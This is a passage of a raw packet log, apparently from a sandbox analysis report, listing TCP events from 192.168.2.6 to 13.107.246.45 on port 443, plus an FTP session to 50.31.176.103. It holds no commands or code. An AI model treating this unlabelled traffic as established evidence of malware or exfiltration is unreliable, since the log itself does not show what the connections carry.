                                              Nov 6, 2024 17:03:10.521657944 CET50122443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.521670103 CET4435012213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:10.522656918 CET50121443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.522674084 CET4435012113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:10.524539948 CET50123443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.524549961 CET4435012313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:10.524599075 CET50123443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.524724960 CET50123443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.524734020 CET4435012313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:10.554308891 CET56862443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.565587997 CET50124443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.565624952 CET4435012413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:10.565718889 CET50124443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.567321062 CET50124443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.567333937 CET4435012413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:10.827104092 CET4435691513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:10.827179909 CET4435691513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:10.827238083 CET56915443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.830076933 CET56915443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.830101967 CET4435691513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:10.830121994 CET56915443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.830130100 CET4435691513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:10.838112116 CET50125443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.838165998 CET4435012513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:10.838223934 CET50125443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.838506937 CET50125443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:10.838522911 CET4435012513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.020520926 CET215011450.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:11.020761967 CET5012032033192.168.2.650.31.176.103
                                              Nov 6, 2024 17:03:11.020800114 CET5012032033192.168.2.650.31.176.103
                                              Nov 6, 2024 17:03:11.025608063 CET320335012050.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:11.026194096 CET320335012050.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:11.026241064 CET5012032033192.168.2.650.31.176.103
                                              Nov 6, 2024 17:03:11.067743063 CET5011421192.168.2.650.31.176.103
                                              Nov 6, 2024 17:03:11.168550014 CET215011450.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:11.208370924 CET5011421192.168.2.650.31.176.103
                                              Nov 6, 2024 17:03:11.246814966 CET4435012113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.247303009 CET50121443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.247359037 CET4435012113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.247785091 CET50121443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.247791052 CET4435012113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.259552956 CET4435012213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.259917974 CET50122443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.259944916 CET4435012213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.260361910 CET50122443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.260373116 CET4435012213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.274483919 CET4435012313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.274962902 CET50123443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.274982929 CET4435012313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.275408983 CET50123443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.275413036 CET4435012313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.304856062 CET4435012413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.304922104 CET50124443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.309032917 CET50124443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.309042931 CET4435012413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.309303999 CET4435012413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.310000896 CET50124443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.351336002 CET4435012413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.375545025 CET4435012113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.376194000 CET4435012113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.376245975 CET4435012113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.376250029 CET50121443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.376296997 CET50121443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.376349926 CET50121443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.376374006 CET4435012113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.376389027 CET50121443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.376394033 CET4435012113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.379020929 CET50126443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.379053116 CET4435012613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.379129887 CET50126443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.379292011 CET50126443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.379304886 CET4435012613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.393616915 CET4435012213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.393683910 CET4435012213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.393800020 CET50122443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.393836975 CET50122443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.393850088 CET4435012213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.393874884 CET50122443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.393879890 CET4435012213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.395781040 CET50127443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.395829916 CET4435012713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.396076918 CET50127443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.396198034 CET50127443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.396214962 CET4435012713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.411037922 CET4435012313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.411108017 CET4435012313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.411243916 CET50123443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.411273956 CET50123443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.411287069 CET4435012313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.411298037 CET50123443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.411300898 CET4435012313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.413160086 CET50128443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.413181067 CET4435012813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.413255930 CET50128443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.413364887 CET50128443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.413374901 CET4435012813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.435323954 CET4435012413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.435508966 CET4435012413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.435560942 CET50124443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.435615063 CET50124443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.435625076 CET4435012413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.435636044 CET50124443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.435640097 CET4435012413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.437582016 CET50129443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.437597036 CET4435012913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:11.437668085 CET50129443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.437813044 CET50129443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:11.437822104 CET4435012913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.127748966 CET4435012613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.128210068 CET50126443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.128231049 CET4435012613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.128716946 CET50126443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.128724098 CET4435012613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.129676104 CET4435012713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.129951000 CET50127443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.129981995 CET4435012713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.130466938 CET50127443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.130472898 CET4435012713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.143754005 CET4435012813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.144099951 CET50128443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.144125938 CET4435012813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.144504070 CET50128443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.144509077 CET4435012813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.175502062 CET4435012913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.175854921 CET50129443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.175879955 CET4435012913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.176279068 CET50129443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.176289082 CET4435012913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.257976055 CET4435012613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.258012056 CET4435012613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.258076906 CET4435012613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.258141994 CET50126443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.258311033 CET50126443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.258327961 CET4435012613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.258338928 CET50126443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.258346081 CET4435012613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.261038065 CET50130443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.261080027 CET4435013013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.261202097 CET50130443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.261352062 CET50130443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.261365891 CET4435013013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.261540890 CET4435012713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.262168884 CET4435012713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.262232065 CET50127443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.262303114 CET50127443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.262321949 CET4435012713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.262334108 CET50127443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.262340069 CET4435012713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.264240026 CET50131443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.264278889 CET4435013113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.264384985 CET50131443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.264496088 CET50131443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.264509916 CET4435013113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.273077011 CET4435012813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.273191929 CET4435012813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.273231030 CET4435012813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.273293972 CET50128443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.273334026 CET50128443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.273341894 CET4435012813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.273351908 CET50128443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.273355961 CET4435012813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.275387049 CET50132443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.275427103 CET4435013213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.275523901 CET50132443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.275659084 CET50132443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.275672913 CET4435013213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.310417891 CET4435012913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.310748100 CET4435012913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.310803890 CET50129443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.310852051 CET50129443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.310852051 CET50129443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.310868979 CET4435012913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.310878038 CET4435012913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.313148022 CET50133443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.313159943 CET4435013313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.313353062 CET50133443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.313474894 CET50133443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.313486099 CET4435013313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.991101027 CET4435013013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.991592884 CET50130443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.991624117 CET4435013013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:12.992057085 CET50130443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:12.992063046 CET4435013013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.005022049 CET4435013213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.005506992 CET50132443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.005532980 CET4435013213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.005927086 CET50132443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.005932093 CET4435013213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.030385017 CET4435013313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.030877113 CET50133443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.030908108 CET4435013313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.031310081 CET50133443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.031320095 CET4435013313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.120335102 CET4435013013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.120374918 CET4435013013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.120426893 CET4435013013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.120440960 CET50130443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.120484114 CET50130443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.120723009 CET50130443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.120743990 CET4435013013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.120760918 CET50130443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.120765924 CET4435013013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.123663902 CET50134443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.123697042 CET4435013413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.123758078 CET50134443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.123945951 CET50134443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.123961926 CET4435013413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.135723114 CET4435013213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.135793924 CET4435013213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.135834932 CET4435013213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.135857105 CET50132443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.135885000 CET50132443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.135976076 CET50132443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.135976076 CET50132443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.135984898 CET4435013213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.135998011 CET4435013213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.138679028 CET50135443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.138727903 CET4435013513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.138796091 CET50135443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.138957024 CET50135443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.138967991 CET4435013513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.161735058 CET4435013313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.161804914 CET4435013313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.161859035 CET50133443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.161982059 CET50133443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.161999941 CET4435013313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.162012100 CET50133443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.162019968 CET4435013313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.164433002 CET50136443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.164469004 CET4435013613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.164545059 CET50136443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.164673090 CET50136443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.164688110 CET4435013613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.847204924 CET4435013413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.847995043 CET50134443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.848047018 CET4435013413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.848510981 CET50134443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.848517895 CET4435013413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.868872881 CET4435013513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.869416952 CET50135443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.869436026 CET4435013513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.869816065 CET50135443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.869821072 CET4435013513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.913547993 CET4435013613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.914051056 CET50136443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.914079905 CET4435013613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.914444923 CET50136443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.914450884 CET4435013613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.974879980 CET4435013413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.974931002 CET4435013413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.974986076 CET4435013413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.975055933 CET50134443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.975116014 CET50134443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.975405931 CET50134443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.975423098 CET4435013413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.975434065 CET50134443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.975439072 CET4435013413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.978477001 CET50137443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.978527069 CET4435013713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:13.978621006 CET50137443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.978830099 CET50137443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:13.978844881 CET4435013713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.366453886 CET4435013513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.367456913 CET4435013513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.367522001 CET50135443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.367547989 CET50135443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.367566109 CET4435013513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.367579937 CET50135443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.367585897 CET4435013513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.367748976 CET4435013613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.367806911 CET4435013613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.367863894 CET50136443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.368577003 CET50136443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.368596077 CET4435013613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.368606091 CET50136443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.368612051 CET4435013613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.370054007 CET4435013113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.371340036 CET50138443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.371362925 CET4435013813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.371440887 CET50138443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.371440887 CET50139443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.371474981 CET4435013913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.371526957 CET50139443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.371711016 CET50131443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.371733904 CET4435013113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.372111082 CET50131443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.372119904 CET4435013113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.372246027 CET50138443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.372256041 CET4435013813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.372332096 CET50139443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.372354031 CET4435013913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.499125004 CET4435013113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.499658108 CET4435013113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.499798059 CET50131443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.499847889 CET50131443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.499847889 CET50131443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.499867916 CET4435013113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.499878883 CET4435013113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.502468109 CET50140443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.502530098 CET4435014013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.502613068 CET50140443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.502748966 CET50140443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.502762079 CET4435014013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.749958992 CET4435013713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.750638008 CET50137443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.750672102 CET4435013713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.751441956 CET50137443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.751447916 CET4435013713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.886665106 CET4435013713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.886748075 CET4435013713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.886800051 CET50137443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.887026072 CET50137443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.887048960 CET4435013713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.887059927 CET50137443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.887064934 CET4435013713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.890301943 CET50141443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.890352964 CET4435014113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:14.890430927 CET50141443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.890573025 CET50141443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:14.890588045 CET4435014113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.116486073 CET4435013913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.117136002 CET50139443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.117168903 CET4435013913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.117599964 CET50139443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.117604017 CET4435013913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.137588978 CET4435013813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.138077974 CET50138443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.138111115 CET4435013813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.138465881 CET50138443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.138472080 CET4435013813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.243944883 CET4435014013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.244553089 CET50140443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.244592905 CET4435014013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.244999886 CET50140443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.245007038 CET4435014013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.246799946 CET4435013913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.247431993 CET4435013913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.247479916 CET4435013913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.247495890 CET50139443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.247539997 CET50139443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.247596979 CET50139443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.247617960 CET4435013913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.247627974 CET50139443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.247633934 CET4435013913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.250334978 CET50142443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.250375032 CET4435014213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.250519991 CET50142443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.250767946 CET50142443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:15.250782967 CET4435014213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.274204016 CET4435013813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.274307013 CET4435013813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:15.274378061 CET50138443192.168.2.613.107.246.45
